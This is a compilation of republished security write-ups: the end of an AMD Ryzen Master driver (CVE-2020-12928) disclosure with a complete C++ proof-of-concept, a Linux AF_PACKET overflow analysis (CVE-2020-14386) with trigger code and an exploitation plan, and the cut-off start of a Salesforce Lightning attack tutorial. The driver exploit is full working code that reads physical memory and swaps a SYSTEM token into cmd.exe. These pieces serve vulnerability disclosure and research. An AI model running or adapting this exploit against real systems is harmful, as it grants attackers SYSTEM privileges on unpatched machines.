You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:

if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

  • 1 May 2020: Vendor notified of vulnerability
  • 1 May 2020: Vendor acknowledges vulnerability
  • 18 May 2020: Vendor supplies patch, restricting driver access to Administrator group
  • 18 May 2020 — 11 July 2020: Back and forth about CVE assignment
  • 23 Aug 2020 — CVE-2020-12928 assigned
  • 13 Oct 2020 — Joint Disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <chrono>
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe
};

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;
} WRITE_INPUT_BUFFER;

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

struct SYSTEM_TOKENS {
    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        exit(1);
    }
    else
    {
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;
    }
}

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= 0x240000000) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;
        }

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";
        //Sleep(500);

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        iteration++;

        //DebugBreak();
        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }
    }
}

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }
}

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0xc,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }
}

int main()
{
    srand((unsigned)time(0));
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);

    write(hFile);
}

 

CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel

Original text by Or Cohen

Executive Summary

Lately, I’ve been investing time into auditing packet sockets source code in the Linux kernel. This led me to the discovery of CVE-2020-14386, a memory corruption vulnerability in the Linux kernel. Such a vulnerability can be used to escalate privileges from an unprivileged user into the root user on a Linux system. In this blog, I will provide a technical walkthrough of the vulnerability, how it can be exploited and how Palo Alto Networks customers are protected.

A few years ago, several vulnerabilities were discovered in packet sockets (CVE-2017-7308 and CVE-2016-8655), and there are some publications, such as this one in the Project Zero blog and this in Openwall, which give some overview of the main functionality.

Specifically, in order for the vulnerability to be triggerable, we need the kernel to have AF_PACKET sockets enabled (CONFIG_PACKET=y) and the CAP_NET_RAW privilege for the triggering process, which can be obtained in an unprivileged user namespace if user namespaces are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users. Surprisingly, this long list of constraints is satisfied by default in some distributions, like Ubuntu.

Palo Alto Networks Cortex XDR customers can prevent this bug with a combination of the Behavioral Threat Protection (BTP) feature and Local Privilege Escalation Protection module, which monitor malicious behaviors across a sequence of events, and immediately terminate the attack when it is detected.

Technical Details

(All of the code figures on this section are from the 5.7 kernel sources.)

Due to the fact that the implementation of AF_PACKET sockets was covered in-depth in the Project Zero blog, I will omit some details that were already described in that article (such as the relation between frames and blocks) and go directly into describing the vulnerability and its root cause.

The bug stems from an arithmetic issue that leads to memory corruption. The issue lies in the tpacket_rcv function, located in net/packet/af_packet.c.

The arithmetic bug was introduced on July 19, 2008, in the commit 8913336 (“packet: add PACKET_RESERVE sockopt”). However, it became triggerable for memory corruption only in February 2016, in the commit 58d19b19cd99 (“packet: vnet_hdr support for tpacket_rcv“). There were some attempts to fix it, such as commit bcc536 (“net/packet: fix overflow in check for tp_reserve”) in May 2017 and commit edb58be (“packet: Don’t write vnet header beyond end of buffer”) in August 2017. However, those fixes were not enough to prevent memory corruption.

In order to trigger the vulnerability, a raw socket (AF_PACKET domain, SOCK_RAW type) has to be created with a TPACKET_V2 ring buffer and a specific value for the PACKET_RESERVE option. Let’s first have a look at the PACKET_RESERVE option:

PACKET_RESERVE (with PACKET_RX_RING) - By default, a packet receive ring writes packets immediately following the metadata structure and alignment padding. This integer option reserves additional headroom.
(from https://man7.org/linux/man-pages/man7/packet.7.html)

The headroom that is mentioned in the manual is simply a buffer with size specified by the user, which will be allocated before the actual data of every packet received on the ring buffer. This value can be set from user-space via the setsockopt system call.

case PACKET_RESERVE:
{
    unsigned int val;

    if (optlen != sizeof(val))
        return -EINVAL;
    if (copy_from_user(&val, optval, sizeof(val)))
        return -EFAULT;
    if (val > INT_MAX)
        return -EINVAL;
    lock_sock(sk);
    if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) {
        ret = -EBUSY;
    } else {
        po->tp_reserve = val;
        ret = 0;
    }
    release_sock(sk);
    return ret;
}

Figure 1. Implementation of setsockopt – PACKET_RESERVE

As we can see in Figure 1, initially, there is a check that the value is smaller than INT_MAX. This check was added in this patch to prevent an overflow in the calculation of the minimum frame size in packet_set_ring. Later, it’s verified that pages were not allocated for the receive/transmit ring buffer. This is done to prevent inconsistency between the tp_reserve field and the ring buffer itself.
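
From user-space, reaching this code is an ordinary setsockopt call on an AF_PACKET socket. A minimal sketch (requires CAP_NET_RAW, as discussed above; the reserve value is just an example and error handling is omitted):

#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <sys/socket.h>

int main(void)
{
    /* Raw packet socket; needs CAP_NET_RAW (e.g. via an unprivileged
     * user namespace, as described earlier). */
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

    /* TPACKET_V2 ring buffer, as required to reach the vulnerable path. */
    int version = TPACKET_V2;
    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));

    /* Attacker-chosen headroom; anything up to INT_MAX passes the check
     * shown in Figure 1. */
    unsigned int reserve = 0x10000;
    setsockopt(fd, SOL_PACKET, PACKET_RESERVE, &reserve, sizeof(reserve));

    return 0;
}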

After setting the value of tp_reserve, we can trigger allocation of the ring buffer itself via the setsockopt system call with optname of PACKET_RX_RING:

Create a memory-mapped ring buffer for asynchronous packet reception.

Figure 2. From manual packet – PACKET_RX_RING option.
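
From the user-space side, this is one more setsockopt call on the same socket, passing a tpacket_req that describes the block/frame geometry. A sketch with illustrative values only (the frame size has to satisfy the minimum-size check shown below in Figure 3, so it accounts for the large tp_reserve chosen in the previous sketch):

#include <linux/if_packet.h>
#include <string.h>
#include <sys/socket.h>

void setup_rx_ring(int fd)
{
    struct tpacket_req req;
    memset(&req, 0, sizeof(req));

    req.tp_block_size = 0x11000;  /* page-aligned, one frame per block      */
    req.tp_block_nr   = 2;        /* number of blocks in the ring           */
    req.tp_frame_size = 0x11000;  /* >= tp_hdrlen + tp_reserve (Figure 3)   */
    req.tp_frame_nr   = 2;        /* frames per block * tp_block_nr         */

    /* Triggers packet_set_ring -> alloc_pg_vec in the kernel; the ring can
     * then be mmap'd into the process, as tcpdump-style consumers do. */
    setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
}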

This is implemented in the packet_set_ring function. Initially, before the ring buffer is allocated, there are several arithmetic checks on the tpacket_req structure received from user-space:

min_frame_size = po->tp_hdrlen + po->tp_reserve;
...
if (unlikely(req->tp_frame_size < min_frame_size))
    goto out;

Figure 3. Part of the sanity checks in the packet_set_ring function.

As we can see in Figure 3, first, the minimum frame size is calculated, and then it is verified versus the value received from user-space. This check ensures that there is space in each frame for the tpacket header structure (for its corresponding version) and tp_reserve number of bytes.

Later, after doing all the sanity checks, the ring buffer itself is allocated via a call to alloc_pg_vec:

order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);

Figure 4. Calling the ring buffer allocation function in the packet_set_ring function.

As we can see from the figure above, the block size is controlled from user-space. The alloc_pg_vec function allocates the pg_vec array and then allocates each block via the alloc_one_pg_vec_page function:

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
    unsigned int block_nr = req->tp_block_nr;
    struct pgv *pg_vec;
    int i;

    pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
    if (unlikely(!pg_vec))
        goto out;

    for (i = 0; i < block_nr; i++) {
        pg_vec[i].buffer = alloc_one_pg_vec_page(order);

Figure 5. alloc_pg_vec implementation.

The alloc_one_pg_vec_page function uses __get_free_pages in order to allocate the block pages:

static char *alloc_one_pg_vec_page(unsigned long order)
{
    char *buffer;
    gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
                      __GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

    buffer = (char *) __get_free_pages(gfp_flags, order);
    if (buffer)
        return buffer;

Figure 6. alloc_one_pg_vec_page implementation.

After the blocks are allocated, the pg_vec array is saved in the packet_ring_buffer structure embedded in the packet_sock structure representing the socket.

When a packet is received on an interface the socket is bound to, the tpacket_rcv function will be called, and the packet data, along with the TPACKET metadata, will be written into the ring buffer. In a real application, such as tcpdump, this buffer is mmap’d to user-space and packet data can be read from it.
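To make that setup concrete, below is a minimal userspace sketch of the flow described so far: creating the raw socket, selecting TPACKET_V2, setting PACKET_RESERVE and PACKET_VNET_HDR, and attaching the receive ring. The sizes are illustrative placeholders and error handling is omitted; creating such a socket requires CAP_NET_RAW (for example from within an unprivileged user namespace).

/* Illustrative sketch only: standard AF_PACKET setup, not exploit code. */
#include <sys/socket.h>
#include <sys/mman.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

int setup_rx_ring(unsigned int reserve)
{
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    int version = TPACKET_V2;
    int on = 1;
    struct tpacket_req req = {
        /* per Figure 3, tp_frame_size must be at least
         * po->tp_hdrlen + tp_reserve, so a large reserve value
         * needs correspondingly large frame/block sizes */
        .tp_block_size = 4096,
        .tp_block_nr   = 4,
        .tp_frame_size = 4096,
        .tp_frame_nr   = 4,
    };

    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
    setsockopt(fd, SOL_PACKET, PACKET_RESERVE, &reserve, sizeof(reserve));
    setsockopt(fd, SOL_PACKET, PACKET_VNET_HDR, &on, sizeof(on));
    setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));

    /* a consumer such as tcpdump would now mmap the ring buffer */
    mmap(NULL, (size_t)req.tp_block_size * req.tp_block_nr,
         PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    return fd;
}

int main(void)
{
    return setup_rx_ring(64) < 0;
}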

The Bug

Now let’s dive into the implementation of the tpacket_rcv function (Figure 7). First, skb_network_offset is called in order to extract the offset of the network header in the received packet into maclen. In our case, this size is 14 bytes, which is the size of an ethernet header. After that, netoff (which represents the offset of the network header in the frame) is calculated, taking into account the TPACKET header (fixed per version), the maclen and the tp_reserve value (controlled by the user).

However, this calculation can overflow, as the type of tp_reserve is unsigned int and the type of netoff is unsigned short, and the only constraint (as we saw earlier) on the value of tp_reserve is to be smaller than INT_MAX.

if (sk->sk_type == SOCK_DGRAM) {
    ...
} else {
    unsigned int maclen = skb_network_offset(skb);
    netoff = TPACKET_ALIGN(po->tp_hdrlen +
                           (maclen < 16 ? 16 : maclen)) +
                           po->tp_reserve;
    if (po->has_vnet_hdr) {
        netoff += sizeof(struct virtio_net_hdr);
        do_vnet = true;
    }
    macoff = netoff - maclen;
}

Figure 7. The arithmetic calculation in tpacket_rcv

Also shown in Figure 7, if the PACKET_VNET_HDR option is set on the socket, sizeof(struct virtio_net_hdr) is added to it in order to account for the virtio_net_hdr structure, which should be right beyond the ethernet header. And finally, the offset of the ethernet header is calculated and saved into macoff.

Later in that function, seen in Figure 8 below, the virtio_net_hdr structure is written into the ring buffer using the virtio_net_hdr_from_skb function. In Figure 8, h.raw points into the currently free frame in the ring buffer (which was allocated in alloc_pg_vec).

if (do_vnet &&
    virtio_net_hdr_from_skb(skb, h.raw + macoff -
                            sizeof(struct virtio_net_hdr),
                            vio_le(), true, 0))
    goto drop_n_account;

Figure 8. Call to virtio_net_hdr_from_skb function in tpacket_rcv

Initially, I thought it might be possible to use the overflow in order to make netoff a small value, so macoff could receive a larger value (from the underflow) than the size of a block and write beyond the bounds of the buffer.

However, this is prevented by the following check:

if (po->tp_version <= TPACKET_V2) {
    if (macoff + snaplen > po->rx_ring.frame_size) {
        ...
        snaplen = po->rx_ring.frame_size - macoff;
        if ((int)snaplen < 0) {
            snaplen = 0;
            do_vnet = false;
        }
    }

Figure 9. Another arithmetic check in the tpacket_rcv function.

This check is not sufficient to prevent memory corruption, as we can still make macoff a small integer value by overflowing netoff. Specifically, we can make macoff smaller than sizeof(struct virtio_net_hdr), which is 10 bytes, and write behind the bounds of the buffer using virtio_net_hdr_from_skb.
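To see the truncation concretely, the following standalone sketch mimics the arithmetic from Figure 7 with a 16-bit netoff. The header lengths here are illustrative stand-ins (and in a real setup tp_frame_size would also have to satisfy the check from Figure 3), but the effect is the same: a suitably chosen tp_reserve wraps netoff so that macoff ends up smaller than the 10-byte virtio_net_hdr, and the write starts before the frame.

/* Illustrative userspace sketch of the 16-bit wrap, not kernel code. */
#include <stdio.h>

#define TPACKET_ALIGNMENT 16
#define TPACKET_ALIGN(x) (((x) + TPACKET_ALIGNMENT - 1) & ~(TPACKET_ALIGNMENT - 1))

int main(void)
{
    unsigned int tp_hdrlen   = 52;   /* assumed stand-in for the TPACKET_V2 header length */
    unsigned int vnet_hdrlen = 10;   /* sizeof(struct virtio_net_hdr) */
    unsigned int maclen      = 14;   /* ethernet header */
    unsigned int fixed = TPACKET_ALIGN(tp_hdrlen + (maclen < 16 ? 16 : maclen));

    /* pick tp_reserve so the 16-bit netoff wraps to a value just above maclen */
    unsigned int tp_reserve = 0x10000 - fixed - vnet_hdrlen + maclen + 6;

    unsigned short netoff = fixed + tp_reserve;  /* truncated to 16 bits */
    netoff += vnet_hdrlen;                       /* PACKET_VNET_HDR is set */
    unsigned short macoff = netoff - maclen;

    printf("tp_reserve = %u, netoff = %u, macoff = %u\n", tp_reserve, netoff, macoff);
    printf("virtio_net_hdr write starts at offset %d relative to the frame\n",
           (int)macoff - (int)vnet_hdrlen);      /* negative: before the ring buffer */
    return 0;
}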

The Primitive

By controlling the value of macoff, we can initialize the virtio_net_hdr structure at a controlled offset of up to 10 bytes behind the ring buffer. The virtio_net_hdr_from_skb function starts by zeroing out the entire struct and then initializes some fields within the struct based on the skb structure.

static inline int virtio_net_hdr_from_skb(const struct sk_buff *skb,
                                          struct virtio_net_hdr *hdr,
                                          bool little_endian,
                                          bool has_data_valid,
                                          int vlan_hlen)
{
    memset(hdr, 0, sizeof(*hdr)); /* no info leak */

    if (skb_is_gso(skb)) {
        ...
    if (skb->ip_summed == CHECKSUM_PARTIAL) {
        ...

Figure 10. Implementation of the virtio_net_hdr_from_skb function.

However, we can set up the skb so that only zeros will be written into the structure. This leaves us with the ability to zero 1-10 bytes behind a __get_free_pages allocation. Without any heap manipulation, this simply causes an immediate kernel crash.

POC

A POC code for triggering the vulnerability can be found in the following Openwall thread.

Patch

I submitted the following patch in order to fix the bug.

The code shown represents the author's proposed patch for CVE-2020-14386.

Figure 11. My proposed patch for the bug.

The idea is that if we change the type of netoff from unsigned short to unsigned int, we can check whether it exceeds USHRT_MAX, and if so, drop the packet and prevent further processing.
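The effect of that check can be demonstrated with a standalone sketch reusing the illustrative constants from the earlier example; this approximates the fix described above rather than reproducing the exact upstream diff.

/* Illustrative sketch of the fix: netoff computed as a 32-bit value and
 * rejected when it no longer fits in 16 bits, so no truncation can occur. */
#include <stdio.h>
#include <limits.h>

#define TPACKET_ALIGNMENT 16
#define TPACKET_ALIGN(x) (((x) + TPACKET_ALIGNMENT - 1) & ~(TPACKET_ALIGNMENT - 1))

int main(void)
{
    unsigned int tp_hdrlen   = 52;      /* assumed stand-in, as before */
    unsigned int vnet_hdrlen = 10;
    unsigned int maclen      = 14;
    unsigned int tp_reserve  = 65466;   /* the value that wrapped netoff earlier */

    unsigned int netoff = TPACKET_ALIGN(tp_hdrlen + (maclen < 16 ? 16 : maclen))
                          + tp_reserve + vnet_hdrlen;   /* no 16-bit truncation */

    if (netoff > USHRT_MAX) {
        printf("netoff = %u > USHRT_MAX: the packet would be dropped\n", netoff);
        return 0;
    }
    printf("macoff = %u\n", netoff - maclen);
    return 0;
}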

Idea for Exploitation

Our idea for exploitation is to convert the primitive to a use-after-free. For this, we thought about decrementing a reference count of some object. For example, if an object has a refcount value of 0x10001, the corruption would look as follows:

This illustrates the process of zeroing out a byte in an object refcount, exploiting CVE-2020-14386. It shows the appearance before corruption, with an example refcount value of 0x10001, and after corruption, when the refcount = 0x1.

Figure 12. Zeroing out a byte in an object refcount.

As we can see in Figure 12 above, after corruption, the refcount will have a value of 0x1, so after releasing one reference, the object will be freed.
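A tiny standalone sketch of that byte-level effect (purely illustrative; assumes a 32-bit little-endian refcount):

/* Illustrative only: zeroing the two most significant bytes of a
 * little-endian 32-bit refcount of 0x10001 leaves the value 0x1. */
#include <stdio.h>
#include <string.h>

int main(void)
{
    unsigned int refcnt = 0x10001;
    unsigned char *bytes = (unsigned char *)&refcnt;

    /* the primitive zeroes trailing bytes of the neighbouring object;
     * here that corresponds to bytes 2 and 3 of the refcount */
    memset(bytes + 2, 0, 2);

    printf("refcnt after corruption: 0x%x\n", refcnt); /* prints 0x1 */
    return 0;
}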

However, in order to make this happen, the following constraints have to be satisfied:

  • The refcount has to be located in the last 1-10 bytes of the object.
  • We need to be able to allocate the object at the end of a page.
    • This is because get_free_pages returns a page-aligned address.

We used some grep expressions along with some manual analysis of code, and we came up with the following object:

struct sctp_shared_key {
    struct list_head key_list;
    struct sctp_auth_bytes *key;
    refcount_t refcnt;
    __u16 key_id;
    __u8 deactivated;
};

Figure 13. Definition of the sctp_shared_key structure.

It seems like this object satisfies our constraints:

  • We can create an sctp server and a client from an unprivileged user context.
    • Specifically, the object is allocated in the sctp_auth_shkey_create function.
  • We can allocate the object at the end of a page.
    • The size of the object is 32 bytes and it is allocated via kmalloc. This means the object is allocated in the kmalloc-32 cache.
    • We were able to verify that we can allocate a kmalloc-32 slab cache page behind our get_free_pages allocation. So we will be able to corrupt the last object in that slab cache page.
      • Because 4096 % 32 == 0, there is no spare space at the end of the slab page, and the last object is allocated right behind our allocation. Other slab cache sizes may not be good for us, such as 96 bytes, because 4096 % 96 != 0.
  • We can corrupt the highest 2 bytes of the refcnt field.
    • After compilation, the size of key_id and deactivated is 4 bytes each.
    • If we use the bug to corrupt 9-10 bytes, we will corrupt the 1-2 most significant bytes of the refcnt field.

Conclusion

I was surprised that such simple arithmetic security issues still exist in the Linux kernel and haven’t been previously discovered. Also, unprivileged user namespaces expose a huge attack surface for local privilege escalation, so distributions should consider whether they should enable them or not.

Palo Alto Networks Cortex XDR stops threats on endpoints and coordinates enforcement with network and cloud security to prevent successful cyber attacks. To prevent the exploitation of this bug, the Behavioral Threat Protection (BTP) feature and Local Privilege Escalation Protection module in Cortex XDR would monitor malicious behaviors across a sequence of events and immediately terminate the attack when detected.

Salesforce Lightning — An in-depth look at exploitation vectors for the everyday community

Salesforce Lightning - An in-depth look at exploitation vectors for the everyday community

Original text by Aaron Costello

Introduction

The purpose of this tutorial is to share my knowledge of exploiting common misconfigurations found in the popular CRM, Salesforce Lightning. At the time of writing there is no public documentation on the attacker perspective. This article is not conclusive on the topic: a small number of specific attack vectors are not discussed (eg: blind SOQL injection), nor are all default controller methods that can be taken advantage of as an attacker. It will hopefully, however, provide sufficient knowledge to begin exploiting these pitfalls.

There are plenty of resources for code samples within the developer documentation already, and more than enough VDPs/BBPs to satisfy a thirst to begin applying your newfound knowledge immediately. However, I will walk through creating your own developer instance, which will both help in grasping the concepts outlined here and show how it can be used to assist in attacking other Salesforce Lightning instances. This isn’t mandatory for exploitation, but helpful.

Temporary and unrelated note: I am currently searching for a security engineer / offensive security position (remote ideally, from Ireland but timezone flexible). If your company, or one you know of, is hiring within these parameters, I’d love to know more (Twitter DM is perfect).

What is Salesforce Lightning?

Simply put, it’s a bundle of frameworks providing tech for UI, CSS/styling, but most importantly applications and components. It’s ideally used for Customer Relationship Management (CRM), and as such the vast majority of encounters will be for support sites, whether it’s for the everyday user of a product or privately for partners. Think support case filing, articles, topic discussions etc et al. The developer edition is free to try out, which I highly recommend and will outline in the next subsection.

Creating your own Salesforce Developer (Community) Instance

The creation of your own instance is entirely optional. However, in terms of exploitation, you will require a ‘template’ request, which is an HTTP request made to a specific Lightning endpoint that you will be utilising against other hosts. Most public Salesforce instances make these requests, so it’s not completely necessary to have your own. But if you have a desire to really grasp the information in this article (and potentially find even more useful queries that can be used in conjunction with exploitation) then I’d suggest doing so.

Creation of an instance is simple:

  1. Navigate to this link and sign up
  2. Authenticate to the instance
  3. Search ‘Communities’ in the Quick Find bar and click ‘Communities Settings’
  4. Domain Name > Enter a subdomain prefix
  5. Click ‘Save’
  6. Click ‘New community’ and select a template.
  7. Click ‘Get Started’. Provide a name and URL suffix
  8. Click ‘Create’
  9. On the Workspace page, click the ‘Builder’ button under the ‘My Workspaces’ heading
  10. On the top right, click the ‘Publish’ button in order to make the community fully public. Navigating to the link in your email will show you your public community site!
site.PNG

Key Terms

